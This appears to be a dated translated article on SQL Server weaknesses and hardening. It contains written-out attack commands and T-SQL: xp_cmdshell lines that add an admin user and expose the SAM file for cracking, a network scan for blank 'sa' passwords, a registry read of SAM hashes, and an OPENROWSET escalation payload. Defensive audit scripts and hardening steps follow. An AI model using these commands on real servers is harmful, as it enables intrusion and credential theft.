Some security issues with SQL Server

Source: Internet
Author: User
Keywords: Security, SQL Server
There are currently many ways to break into an NT Server, such as exploiting IIS vulnerabilities, but you may not know that the SQL Server database server that usually sits alongside NT Server is also a very common route. Some of the Herbless intrusions, such as the one against the legoland.co.uk site, went through SQL Server to gain control of the system and deface it. Protecting SQL Server is therefore essential; here I collect some weaknesses for your reference.

First, let's look at the network protocol libraries supported by SQL Server:

SQL Server Network Protocol Libraries
--------------------------------------------------------------
| Protocol library  | Possible vulnerabilities                                        | Encrypted |
--------------------------------------------------------------
| Named Pipes       | Uses the NT SMB ports (TCP 139, UDP 137/138) to communicate.    | No        |
|                   | These can be controlled at the firewall, but casual access from |           |
|                   | inside the network is still a small defect.                     |           |
|                   | User name, password and data are transmitted unencrypted;       |           |
|                   | anyone can capture them with a sniffer.                         |           |
--------------------------------------------------------------
| IP Sockets        | Opens port 1433 by default; a scanner can find this port.       | No        |
|                   | Data can be intercepted with a sniffer.                         |           |
--------------------------------------------------------------
| Multi-Protocol    | The client needs to support NT RPCs, which may cause problems   | Optional  |
|                   | in some environments.                                           | (off by   |
|                   | Uses a random TCP port by default, but a fixed port mapping can | default)  |
|                   | be implemented for the firewall (see KB Q164667).               |           |
|                   | The encryption option must be chosen deliberately; it is not    |           |
|                   | selected by default.                                            |           |
--------------------------------------------------------------
| NWLink            | Risk of data interception by a sniffer.                         | No        |
--------------------------------------------------------------
| AppleTalk (ADSP)  | Risk of data interception by a sniffer.                         | No        |
--------------------------------------------------------------
| Banyan Vines      | Risk of data interception by a sniffer.                         | No        |
--------------------------------------------------------------

The general recommendation is: if you can use integrated (NT) security over Named Pipes or Multi-Protocol, use those protocol libraries, and if possible use Multi-Protocol with the encryption option enabled. If you cannot use the above, use the IP Sockets protocol, change its default port, and check the system regularly to make sure no sniffer is present. Also consider using a Web service or COM component as the business object layer of your application, with a secure channel between the middle tier and SQL Server; a number of third-party products can encrypt this communication.

--------------------------------------------------------------

Next, the security modes of SQL Server and how they work. A security mode defines how SQL Server authenticates the users who want to use its services. The following table describes the security modes of SQL Server 6.5 and what changed in SQL Server 7.0:

-----------------------------------------------------------------
| Security mode   | SQL Server 6.5                                          | Changes in SQL Server 7.0                          |
-----------------------------------------------------------------
| Standard        | Logins are defined in SQL Server and given a password.  | The separate Standard mode is no longer used.      |
|                 | SQL Server login accounts are separate from Windows NT. |                                                    |
-----------------------------------------------------------------
| Integrated      | Accounts are managed with SQL Security Manager.         | Becomes "Windows NT only" mode.                    |
|                 | A user connected to SQL Server does not need a separate | Works only on NT systems; not supported on Win9x.  |
|                 | login and password.                                     | NT groups can be integrated directly for easy      |
|                 | Passwords are never stored in applications and never    | management (note that a BUILTIN group is generated |
|                 | transmitted in plaintext on the network.                | on the local system).                              |
|                 | SQL Server can use NT's authentication features, such   |                                                    |
|                 | as account expiration.                                  |                                                    |
|                 | Requires the Named Pipes or Multi-Protocol library.     |                                                    |
-----------------------------------------------------------------
| Mixed           | Combines the features of the two modes above, with the  | Becomes "SQL Server and Windows NT" mode.          |
|                 | drawback being the case where the client cannot         | Try to use Windows NT only mode instead.           |
|                 | establish a trusted connection.                         |                                                    |
-----------------------------------------------------------------

Login is only the first step. Once logged in, the user must access individual databases, and for that to work there must be an entry for the user in the sysusers table of each database. So, to be safe, check whether there is a "guest" account in your database, so that you do not give people access to your database whom you never intended to.
For details you can refer to Microsoft's site: http://www.microsoft.com/technet/SQL/Technote/Secure.asp

-------------------------------------------------------------------

Some security issues with SQL Server:

The 'sa' account exists with an empty password, and 'sa' is a member of SQL Server's system administration role, so we can use the xp_cmdshell extended stored procedure to run operating system commands, for example:

xp_cmdshell "net user testuser Ugothacked /add"

and then:

xp_cmdshell "net localgroup Administrators testuser /add"

With that the attacker has succeeded in adding a user on the SQL Server host. Remotely, this generally requires port 1433 to be open and a connection through an MS SQL client. You can also use xp_cmdshell "rdisk /s-", which rebuilds the information in the \winnt\repair directory without prompting the user. Then, after the SAM backup is made, an attacker can establish an SMB connection to a share, or create one:

xp_cmdshell "net share getsam=c:\winnt\repair"

and use the share to fetch the file and run L0phtCrack on it. If the SMB ports are controlled by a firewall or closed, an attacker can also copy the sam._ file to the Web directory for anonymous download with a browser. If there is no IIS, why not use TFTP.
OK, through this controlled SQL Server an attacker can go on to find other machines within the network to expand their gains. Here is an SQL script that lists the other SQL Servers in the network with an empty 'sa' password:

---------------------------------------------------------------------
-- Create temp table to store enumerated servers
SET NOCOUNT ON
CREATE TABLE #temp (shelldump varchar(255))
INSERT #temp EXEC xp_cmdshell 'osql -L'

DECLARE @current_server varchar(255), @conn_string varchar(255)
DECLARE sql_cursor CURSOR FOR SELECT * FROM #temp
OPEN sql_cursor
FETCH NEXT FROM sql_cursor INTO @current_server

-- Loop through potential targets and check for null SA accounts
-- If target is vulnerable, version information will be displayed
WHILE @@FETCH_STATUS = 0
BEGIN
    IF @current_server <> 'Servers:'
    BEGIN
        SELECT @current_server = RTRIM(LTRIM(@current_server))
        SELECT @conn_string = 'exec xp_cmdshell ''osql -S ' + @current_server
                            + ' -Usa -P -Q "SELECT @@version"'''
        PRINT 'Attempting connection to server: ' + @current_server
        EXECUTE (@conn_string)
        PRINT '====================================================================='
    END
    FETCH NEXT FROM sql_cursor INTO @current_server
END

-- Clean up
CLOSE sql_cursor
DEALLOCATE sql_cursor
DROP TABLE #temp
---------------------------------------------------------------------

Of course some people may have disabled the xp_cmdshell extended stored procedure; the following method can then be used instead:

xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'

If the MSSQLServer service is running under the Local System account and SYSKEY is not installed on the system, the above call can return the encrypted passwords or SIDs from the registry.
------------------------------------------------------------------------

Another weakness concerns ad hoc heterogeneous queries, which can be used for privilege escalation; see Microsoft's description at http://www.microsoft.com/technet/security/bulletin/fq00-014.asp. For this vulnerability the following exploit obtains elevated rights:

SELECT * FROM OPENROWSET('SQLOLEDB', 'Trusted_Connection=yes;Data Source=MyServer', 'SET FMTONLY OFF EXECUTE master..xp_cmdshell "dir c:\"')

This is just one example; other commands can be executed the same way, as you can imagine.

-------------------------------------------------------------------------

There is a more recent vulnerability, the Extended Stored Procedure Parameter Parsing vulnerability, described in detail at http://www.microsoft.com/technet/security/bulletin/ms00-092.asp. The main problem is the API function srv_paraminfo(), which extended stored procedures use to interpret their input parameters. An extended stored procedure is called as:

exec <stored procedure name> <parameter 1>, <parameter 2>

For example, to list the C:\Winnt directory tree you can write:

EXEC xp_dirtree 'c:\winnt'

But because the length of each parameter is not checked, passing a very long string can overwrite other data on the stack and cause a buffer overflow. The currently known affected extended stored procedures are:

1. xp_peekqueue (xpqueue.dll) and xp_printstatements (xprepl.dll): passing a very long string to the first parameter overwrites the return address saved by the exception handler.
2. xp_proxiedmetadata (xprepl.dll): this procedure takes 4 parameters; passing an unusually long string to the second parameter overwrites the return address saved by the exception handler.
3. xp_setsqlsecurity (xpstar.dll): this procedure takes 4 parameters; passing an overly long string to the third parameter causes the entire SQL Server process to terminate immediately.
4. xp_displayparamstmt (xprepl.dll), xp_enumresultset (xprepl.dll), xp_showcolv (xprepl.dll) and xp_updatecolvbm (xprepl.dll): passing an extremely long string to the first argument causes an illegal operation and overwrites the return address saved by the exception handler.

Here is a useful trick: if you want to know which DLL file an extended stored procedure calls, you can run the following:

SELECT o.name, c.text FROM dbo.syscomments c, dbo.sysobjects o WHERE c.id = o.id AND o.name = 'xp_peekqueue'

This gives you the DLL behind the extended stored procedure, and if Microsoft had no patch you could temporarily replace the DLL file. But some DLL files serve several extended stored procedures and cannot be changed blindly, or those procedures stop working; use the following to find out which extended stored procedures a DLL serves:

SELECT o.name, c.text FROM dbo.syscomments c, dbo.sysobjects o WHERE c.id = o.id AND c.text = 'xpqueue.dll'

Fortunately Microsoft has released a patch, which you can find at the address below instead of hunting down the DLLs one by one: http://support.microsoft.com/support/sql/xp_security.asp. This vulnerability was discovered by @stake, who also provide demonstration test code, available here: http://www.atstake.com/research/advisories/2000/SQLADV2-POC.C

------------------------------------------------------------------------

OK, SQL Server of course has some other, relatively minor, vulnerabilities. For example, ISS found that the administrator login ID stored in the registry is protected with a fairly simple encryption method and is easy to recover; for details see http://xforce.iss.net/alerts/advise45.php3. More can be found elsewhere.
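The two catalog queries above look up one procedure or one DLL at a time. As an added example (not code from the original article), the following T-SQL generalizes them into an inventory a defender would run before touching any DLL: every extended stored procedure with its DLL, the DLLs that are shared by more than one procedure, and which of the procedures named in the MS00-092 list are still registered. It assumes the SQL Server 7.0 / 2000 system tables the article itself uses (sysobjects with xtype 'X', and syscomments.text holding the DLL name for an extended stored procedure).

```sql
-- Added example, not from the original article.
-- Assumes SQL Server 7.0 / 2000 catalogs: sysobjects.xtype = 'X' marks an
-- extended stored procedure and syscomments.text holds its DLL name.
USE master
GO

-- 1. One row per extended stored procedure: name, DLL, creation date.
SELECT o.name   AS xproc_name,
       c.text   AS dll_name,
       o.crdate AS created
FROM dbo.sysobjects o
JOIN dbo.syscomments c ON c.id = o.id
WHERE o.xtype = 'X'
ORDER BY c.text, o.name
GO

-- 2. DLLs that serve more than one extended stored procedure. Replacing or
--    removing such a DLL for one procedure breaks all the others listed
--    under it, which is the trap the article warns about.
SELECT c.text   AS dll_name,
       COUNT(*) AS xproc_count
FROM dbo.sysobjects o
JOIN dbo.syscomments c ON c.id = o.id
WHERE o.xtype = 'X'
GROUP BY c.text
HAVING COUNT(*) > 1
ORDER BY xproc_count DESC
GO

-- 3. Which of the procedures named in the MS00-092 list are still present on
--    this server, and which DLL each one is bound to here.
SELECT o.name AS xproc_name,
       c.text AS dll_name
FROM dbo.sysobjects o
JOIN dbo.syscomments c ON c.id = o.id
WHERE o.xtype = 'X'
  AND o.name IN ('xp_peekqueue', 'xp_printstatements', 'xp_proxiedmetadata',
                 'xp_setsqlsecurity', 'xp_displayparamstmt', 'xp_enumresultset',
                 'xp_showcolv', 'xp_updatecolvbm')
ORDER BY c.text, o.name
GO
```

Run it from an isql/osql session as a sysadmin and keep the output of query 2 next to the patch plan: a DLL that appears there cannot be swapped out in isolation, so the vendor patch, not a DLL replacement, is the only clean fix for those procedures.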
-------------------------------------------------------------------

Some security recommendations for SQL Server systems:

1. Make sure you have the latest security patches, which are as follows: Windows NT 4.0 Service Pack 6a; SQL Server 6.5 Service Pack 5a; SQL Server 7.0 Service Pack 2 (plus various hotfixes; check http://www.microsoft.com/download); SQL Server 2000 hotfix S80233i.exe (Intel). Of course, everyone should keep an eye on Microsoft's security bulletins.

2. Do not use port 1433 for IP Sockets, and if you use Multi-Protocol also change its port.

3. Do not embed the 'sa' password in any application, such as VB/Delphi programs or a Global.asa file. 'sa' is a default account of SQL Server, similar to the Administrator account on Windows NT, and it has a blank password by default.

4. Change the password of the 'sa' and 'probe' accounts.

5. Make sure the SQL Server error logs are kept on an NTFS file system.

6. If you do not need xp_cmdshell, do not leave the xp_cmdshell extended stored procedure on the server. Enter the following in any isql window:

   USE master
   sp_dropextendedproc 'xp_cmdshell'

7. Drop the OLE Automation stored procedures you do not need (some features of Enterprise Manager will then be unavailable). These procedures are: sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop.

8. Remove the registry access procedures you do not need: xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumvalues, xp_regread, xp_regremovemultistring.

9. Remove other system stored procedures if you think they still pose a threat. Be careful when dropping these procedures; test on a test machine first to make sure your system still does its normal work. These procedures include: sp_bindsession, sp_cursor, sp_cursorclose, sp_cursorfetch, sp_cursoropen, sp_cursoroption, sp_getbindtoken, sp_getmbcscharlen, sp_ismbcsleadbyte, sp_OACreate, sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProperty, sp_OAMethod, sp_OASetProperty, sp_OAStop, sp_replcmds, sp_replcounters, sp_repldone, sp_replflush, sp_replstatus, sp_repltrans, sp_sdidebug, xp_availablemedia, xp_cmdshell, xp_deletemail, xp_dirtree, xp_dsninfo, xp_enumdsn, xp_enumerrorlogs, xp_enumgroups, xp_enumqueuedtasks, xp_eventlog, xp_findnextmsg, xp_fixeddrives, xp_getfiledetails, xp_getnetname, xp_grantlogin, xp_logevent, xp_loginconfig, xp_logininfo, xp_makewebtask, xp_msver, xp_perfend, xp_perfmonitor, xp_perfsample, xp_perfstart, xp_readerrorlog, xp_readmail, xp_revokelogin, xp_runwebtask, xp_schedulersignal, xp_sendmail, xp_servicecontrol, xp_snmp_getstate, xp_snmp_raisetrap, xp_sprintf, xp_sqlinventory, xp_sqlregister, xp_sqltrace, xp_sscanf, xp_startmail, xp_stopmail, xp_subdirs, xp_unc_to_drive.

10. Remove the guest user from your databases.

11. Turn off SQL Mail to prevent it being used to transmit trojans, viruses and the like.

12. Set up a task that periodically runs the following program and redirects its output to another file or mails it to the administrator's mailbox:

   findstr /C:"Login Failed" \mssql7\log\*.*

13. Frequently check for accounts with a blank password:

   USE master
   SELECT name, password FROM syslogins WHERE password IS NULL ORDER BY name

14. Check which stored procedures and extended stored procedures can be executed without 'sa' permissions, and review their access rights:

   USE master
   SELECT sysobjects.name FROM sysobjects, sysprotects
   WHERE sysprotects.uid = 0 AND xtype IN ('X', 'P') AND sysobjects.id = sysprotects.id
   ORDER BY name

15. Make sure SQL Server's network traffic is kept on an isolated network segment.

Responsible editor: Zhao Zhaoyi#51cto.com, TEL: (010) 68476636-8001
Original title: Some security questions about SQL Server
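The recommendations above are spread over several separate commands. As an added example (not code from the original article), here is one T-SQL audit script that runs the checks they describe in a single pass: blank-password logins, procedures executable by everyone, databases where guest still has access, and whether xp_cmdshell is still registered. It assumes the SQL Server 7.0 / 2000 system tables the article uses (syslogins, sysobjects, sysprotects, sysusers); the sysprotects action code 224 for EXECUTE and the undocumented sp_MSforeachdb procedure are stated as assumptions in the comments.

```sql
-- Added example, not from the original article. Assumes SQL Server 7.0 / 2000
-- system tables. Read-only except for the commented-out drop at the end.
USE master
GO

-- 1. Logins with a blank password (NULL in syslogins). 'sa' and 'probe'
--    appearing here are the first things to fix.
SELECT name, createdate, updatedate
FROM syslogins
WHERE password IS NULL
ORDER BY name
GO

-- 2. Stored procedures (xtype 'P') and extended stored procedures (xtype 'X')
--    that anyone can run: EXECUTE granted to public, which is uid 0 in
--    sysprotects. Assumption: action 224 is the EXECUTE permission code and
--    protecttype 205 is a plain GRANT (204 = GRANT WITH GRANT, 206 = DENY).
SELECT o.name, o.xtype, p.protecttype
FROM sysobjects o
JOIN sysprotects p ON p.id = o.id
WHERE p.uid = 0
  AND p.action = 224
  AND p.protecttype IN (204, 205)
  AND o.xtype IN ('X', 'P')
ORDER BY o.xtype, o.name
GO

-- 3. Databases in which the guest user still has access. sp_MSforeachdb is an
--    undocumented procedure (assumption: present on 7.0 / 2000); it replaces
--    '?' with each database name. master and tempdb always keep guest.
EXEC sp_MSforeachdb
  'IF EXISTS (SELECT 1 FROM [?]..sysusers WHERE name = ''guest'' AND hasdbaccess = 1)
       PRINT ''guest still has access in database: ?'''
GO

-- 4. Is xp_cmdshell still registered? The article's advice is to drop it when
--    nothing needs it; the drop is left commented so the audit stays read-only.
IF EXISTS (SELECT 1 FROM sysobjects WHERE name = 'xp_cmdshell' AND xtype = 'X')
    PRINT 'xp_cmdshell is present'
ELSE
    PRINT 'xp_cmdshell is not registered'
-- EXEC sp_dropextendedproc 'xp_cmdshell'
GO
```

Schedule it alongside the "Login Failed" check from the recommendations and compare each run's output with the previous one: a login that reappears with a NULL password, a new GRANT to public, or guest regaining access to a database is a change somebody made, and each is worth a question.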